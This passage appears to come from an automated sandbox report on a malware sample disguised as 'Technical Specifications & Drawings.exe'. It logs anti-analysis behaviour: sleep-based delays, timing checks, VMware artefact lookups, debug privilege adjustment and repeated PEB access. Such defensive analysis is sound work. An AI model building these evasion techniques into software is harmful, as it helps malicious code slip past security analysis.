          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe TID: 3116 Thread sleep time: -922337203685477s >= -30000s
          Source: C:\Windows\explorer.exe TID: 1972 Thread sleep time: -30000s >= -30000s
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_01875BA5 rdtsc 4_2_01875BA5
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Thread delayed: delay time: 922337203685477
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeAPI coverage: 4.0 %
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Process information queried: ProcessInformation
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Thread delayed: delay time: 45877
          Source: explorer.exe, 00000005.00000000.306843353.00000000080ED000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
          Source: explorer.exe, 00000005.00000000.286686271.0000000008223000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}*^d
          Source: explorer.exe, 00000005.00000000.309044837.0000000008476000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: lume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA
          Source: Technical Specifications & Drawings.exe, 00000000.00000002.263808361.0000000002973000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: InstallPathJC:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
          Source: explorer.exe, 00000005.00000000.320624186.0000000000680000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: _VMware_SATA_CD00#5&280b647&
          Source: explorer.exe, 00000005.00000000.320680950.000000000069D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: Technical Specifications & Drawings.exe, 00000000.00000002.263808361.0000000002973000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmware
          Source: explorer.exe, 00000005.00000000.286686271.0000000008223000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware SATA CD00
          Source: explorer.exe, 00000005.00000000.286686271.0000000008223000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}t]
          Source: explorer.exe, 00000005.00000000.327010240.00000000062C4000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000005.00000000.286686271.0000000008223000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}+]e
          Source: explorer.exe, 00000005.00000000.323194447.0000000004287000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}0
          Source: explorer.exe, 00000005.00000000.330711449.000000000820E000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000
          Source: Technical Specifications & Drawings.exe, 00000000.00000002.263808361.0000000002973000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMware SVGA II
          Source: explorer.exe, 00000005.00000000.306843353.00000000080ED000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000
          Source: explorer.exe, 00000005.00000000.286686271.0000000008223000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware SATA CD00l
          Source: Technical Specifications & Drawings.exe, 00000000.00000002.263808361.0000000002973000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMWAREDSOFTWARE\VMware, Inc.\VMware Tools
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Process token adjusted: Debug
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017AB171 mov eax, dword ptr fs:[00000030h]4_2_017AB171
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017AC962 mov eax, dword ptr fs:[00000030h]4_2_017AC962
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_018649A4 mov eax, dword ptr fs:[00000030h]4_2_018649A4
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_018269A6 mov eax, dword ptr fs:[00000030h]4_2_018269A6
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017CB944 mov eax, dword ptr fs:[00000030h]4_2_017CB944
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_018251BE mov eax, dword ptr fs:[00000030h]4_2_018251BE
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017D513A mov eax, dword ptr fs:[00000030h]4_2_017D513A
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017C4120 mov eax, dword ptr fs:[00000030h]4_2_017C4120
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017C4120 mov ecx, dword ptr fs:[00000030h]4_2_017C4120
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_018341E8 mov eax, dword ptr fs:[00000030h]4_2_018341E8
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017A9100 mov eax, dword ptr fs:[00000030h]4_2_017A9100
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017A9100 mov eax, dword ptr fs:[00000030h]4_2_017A9100
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017A9100 mov eax, dword ptr fs:[00000030h]4_2_017A9100
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017AB1E1 mov eax, dword ptr fs:[00000030h]4_2_017AB1E1
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017AB1E1 mov eax, dword ptr fs:[00000030h]4_2_017AB1E1
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017AB1E1 mov eax, dword ptr fs:[00000030h]4_2_017AB1E1
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017C99BF mov ecx, dword ptr fs:[00000030h]4_2_017C99BF
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017C99BF mov ecx, dword ptr fs:[00000030h]4_2_017C99BF
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017C99BF mov eax, dword ptr fs:[00000030h]4_2_017C99BF
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017C99BF mov ecx, dword ptr fs:[00000030h]4_2_017C99BF
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017C99BF mov ecx, dword ptr fs:[00000030h]4_2_017C99BF
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017C99BF mov eax, dword ptr fs:[00000030h]4_2_017C99BF
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017C99BF mov ecx, dword ptr fs:[00000030h]4_2_017C99BF
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017C99BF mov ecx, dword ptr fs:[00000030h]4_2_017C99BF
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017C99BF mov eax, dword ptr fs:[00000030h]4_2_017C99BF
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017C99BF mov ecx, dword ptr fs:[00000030h]4_2_017C99BF
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017C99BF mov ecx, dword ptr fs:[00000030h]4_2_017C99BF
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017C99BF mov eax, dword ptr fs:[00000030h]4_2_017C99BF
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017D61A0 mov eax, dword ptr fs:[00000030h]4_2_017D61A0
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017D61A0 mov eax, dword ptr fs:[00000030h]4_2_017D61A0
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017D2990 mov eax, dword ptr fs:[00000030h]4_2_017D2990
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017DA185 mov eax, dword ptr fs:[00000030h]4_2_017DA185
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017CC182 mov eax, dword ptr fs:[00000030h]4_2_017CC182
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_01823884 mov eax, dword ptr fs:[00000030h]4_2_01823884
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_01823884 mov eax, dword ptr fs:[00000030h]4_2_01823884
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017C0050 mov eax, dword ptr fs:[00000030h]4_2_017C0050
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017C0050 mov eax, dword ptr fs:[00000030h]4_2_017C0050
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017CA830 mov eax, dword ptr fs:[00000030h]4_2_017CA830
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017CA830 mov eax, dword ptr fs:[00000030h]4_2_017CA830
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017CA830 mov eax, dword ptr fs:[00000030h]4_2_017CA830
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017CA830 mov eax, dword ptr fs:[00000030h]4_2_017CA830
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017D002D mov eax, dword ptr fs:[00000030h]4_2_017D002D
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017D002D mov eax, dword ptr fs:[00000030h]4_2_017D002D
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017D002D mov eax, dword ptr fs:[00000030h]4_2_017D002D
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017D002D mov eax, dword ptr fs:[00000030h]4_2_017D002D
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017D002D mov eax, dword ptr fs:[00000030h]4_2_017D002D
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017BB02A mov eax, dword ptr fs:[00000030h]4_2_017BB02A
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017BB02A mov eax, dword ptr fs:[00000030h]4_2_017BB02A
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017BB02A mov eax, dword ptr fs:[00000030h]4_2_017BB02A
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017BB02A mov eax, dword ptr fs:[00000030h]4_2_017BB02A
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_0183B8D0 mov eax, dword ptr fs:[00000030h]4_2_0183B8D0
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_0183B8D0 mov ecx, dword ptr fs:[00000030h]4_2_0183B8D0
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_0183B8D0 mov eax, dword ptr fs:[00000030h]4_2_0183B8D0
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_0183B8D0 mov eax, dword ptr fs:[00000030h]4_2_0183B8D0
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_0183B8D0 mov eax, dword ptr fs:[00000030h]4_2_0183B8D0
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_0183B8D0 mov eax, dword ptr fs:[00000030h]4_2_0183B8D0
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_01874015 mov eax, dword ptr fs:[00000030h]4_2_01874015
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_01874015 mov eax, dword ptr fs:[00000030h]4_2_01874015
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_01827016 mov eax, dword ptr fs:[00000030h]4_2_01827016
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_01827016 mov eax, dword ptr fs:[00000030h]4_2_01827016
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_01827016 mov eax, dword ptr fs:[00000030h]4_2_01827016
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017A58EC mov eax, dword ptr fs:[00000030h]4_2_017A58EC
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017CB8E4 mov eax, dword ptr fs:[00000030h]4_2_017CB8E4
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017CB8E4 mov eax, dword ptr fs:[00000030h]4_2_017CB8E4
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017A40E1 mov eax, dword ptr fs:[00000030h]4_2_017A40E1
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017A40E1 mov eax, dword ptr fs:[00000030h]4_2_017A40E1
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017A40E1 mov eax, dword ptr fs:[00000030h]4_2_017A40E1
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017DF0BF mov ecx, dword ptr fs:[00000030h]4_2_017DF0BF
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017DF0BF mov eax, dword ptr fs:[00000030h]4_2_017DF0BF
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017DF0BF mov eax, dword ptr fs:[00000030h]4_2_017DF0BF
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017E90AF mov eax, dword ptr fs:[00000030h]4_2_017E90AF
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017D20A0 mov eax, dword ptr fs:[00000030h]4_2_017D20A0
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017D20A0 mov eax, dword ptr fs:[00000030h]4_2_017D20A0
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017D20A0 mov eax, dword ptr fs:[00000030h]4_2_017D20A0
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017D20A0 mov eax, dword ptr fs:[00000030h]4_2_017D20A0
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017D20A0 mov eax, dword ptr fs:[00000030h]4_2_017D20A0
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017D20A0 mov eax, dword ptr fs:[00000030h]4_2_017D20A0
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_01871074 mov eax, dword ptr fs:[00000030h]4_2_01871074
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_01862073 mov eax, dword ptr fs:[00000030h]4_2_01862073
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017A9080 mov eax, dword ptr fs:[00000030h]4_2_017A9080
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_0185D380 mov ecx, dword ptr fs:[00000030h]4_2_0185D380
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017D3B7A mov eax, dword ptr fs:[00000030h]4_2_017D3B7A
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017D3B7A mov eax, dword ptr fs:[00000030h]4_2_017D3B7A
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_0186138A mov eax, dword ptr fs:[00000030h]4_2_0186138A
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017ADB60 mov ecx, dword ptr fs:[00000030h]4_2_017ADB60
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_01875BA5 mov eax, dword ptr fs:[00000030h]4_2_01875BA5
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017AF358 mov eax, dword ptr fs:[00000030h]4_2_017AF358
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017ADB40 mov eax, dword ptr fs:[00000030h]4_2_017ADB40
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_018253CA mov eax, dword ptr fs:[00000030h]4_2_018253CA
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_018253CA mov eax, dword ptr fs:[00000030h]4_2_018253CA
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_018523E3 mov ecx, dword ptr fs:[00000030h]4_2_018523E3
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_018523E3 mov ecx, dword ptr fs:[00000030h]4_2_018523E3
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_018523E3 mov eax, dword ptr fs:[00000030h]4_2_018523E3
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017CA309 mov eax, dword ptr fs:[00000030h]4_2_017CA309
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017CA309 mov eax, dword ptr fs:[00000030h]4_2_017CA309
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017CA309 mov eax, dword ptr fs:[00000030h]4_2_017CA309
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017CA309 mov eax, dword ptr fs:[00000030h]4_2_017CA309
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017CA309 mov eax, dword ptr fs:[00000030h]4_2_017CA309
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017CA309 mov eax, dword ptr fs:[00000030h]4_2_017CA309
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017CA309 mov eax, dword ptr fs:[00000030h]4_2_017CA309
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017CA309 mov eax, dword ptr fs:[00000030h]4_2_017CA309
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017CA309 mov eax, dword ptr fs:[00000030h]4_2_017CA309
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017CA309 mov eax, dword ptr fs:[00000030h]4_2_017CA309
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017CA309 mov eax, dword ptr fs:[00000030h]4_2_017CA309
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017CA309 mov eax, dword ptr fs:[00000030h]4_2_017CA309
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017CA309 mov eax, dword ptr fs:[00000030h]4_2_017CA309
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017CA309 mov eax, dword ptr fs:[00000030h]4_2_017CA309
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017CA309 mov eax, dword ptr fs:[00000030h]4_2_017CA309
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017CA309 mov eax, dword ptr fs:[00000030h]4_2_017CA309
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017CA309 mov eax, dword ptr fs:[00000030h]4_2_017CA309
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017CA309 mov eax, dword ptr fs:[00000030h]4_2_017CA309
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017CA309 mov eax, dword ptr fs:[00000030h]4_2_017CA309
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017CA309 mov eax, dword ptr fs:[00000030h]4_2_017CA309
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017CA309 mov eax, dword ptr fs:[00000030h]4_2_017CA309
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017CDBE9 mov eax, dword ptr fs:[00000030h]4_2_017CDBE9
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_0186131B mov eax, dword ptr fs:[00000030h]4_2_0186131B
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017D03E2 mov eax, dword ptr fs:[00000030h]4_2_017D03E2
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017D03E2 mov eax, dword ptr fs:[00000030h]4_2_017D03E2
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017D03E2 mov eax, dword ptr fs:[00000030h]4_2_017D03E2
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017D03E2 mov eax, dword ptr fs:[00000030h]4_2_017D03E2
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017D03E2 mov eax, dword ptr fs:[00000030h]4_2_017D03E2
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017D03E2 mov eax, dword ptr fs:[00000030h]4_2_017D03E2
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017D4BAD mov eax, dword ptr fs:[00000030h]4_2_017D4BAD
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017D4BAD mov eax, dword ptr fs:[00000030h]4_2_017D4BAD
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017D4BAD mov eax, dword ptr fs:[00000030h]4_2_017D4BAD
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_01878B58 mov eax, dword ptr fs:[00000030h]4_2_01878B58
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017D2397 mov eax, dword ptr fs:[00000030h]4_2_017D2397
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017DB390 mov eax, dword ptr fs:[00000030h]4_2_017DB390
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017B1B8F mov eax, dword ptr fs:[00000030h]4_2_017B1B8F
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017B1B8F mov eax, dword ptr fs:[00000030h]4_2_017B1B8F
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017E927A mov eax, dword ptr fs:[00000030h]4_2_017E927A
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017A9240 mov eax, dword ptr fs:[00000030h]4_2_017A9240
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017A9240 mov eax, dword ptr fs:[00000030h]4_2_017A9240
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017A9240 mov eax, dword ptr fs:[00000030h]4_2_017A9240
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017A9240 mov eax, dword ptr fs:[00000030h]4_2_017A9240
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017E4A2C mov eax, dword ptr fs:[00000030h]4_2_017E4A2C
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017E4A2C mov eax, dword ptr fs:[00000030h]4_2_017E4A2C
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017CA229 mov eax, dword ptr fs:[00000030h]4_2_017CA229
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017CA229 mov eax, dword ptr fs:[00000030h]4_2_017CA229
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017CA229 mov eax, dword ptr fs:[00000030h]4_2_017CA229
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017CA229 mov eax, dword ptr fs:[00000030h]4_2_017CA229
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017CA229 mov eax, dword ptr fs:[00000030h]4_2_017CA229
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017CA229 mov eax, dword ptr fs:[00000030h]4_2_017CA229
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017CA229 mov eax, dword ptr fs:[00000030h]4_2_017CA229
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017CA229 mov eax, dword ptr fs:[00000030h]4_2_017CA229
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017CA229 mov eax, dword ptr fs:[00000030h]4_2_017CA229
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_017C3A1C mov eax, dword ptr fs:[00000030h]4_2_017C3A1C
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_01864AEF mov eax, dword ptr fs:[00000030h]4_2_01864AEF
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_01864AEF mov eax, dword ptr fs:[00000030h]4_2_01864AEF
          Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exeCode function: 4_2_01864AEF mov eax, dword ptr fs:[00000030h]4_2_01864AEF
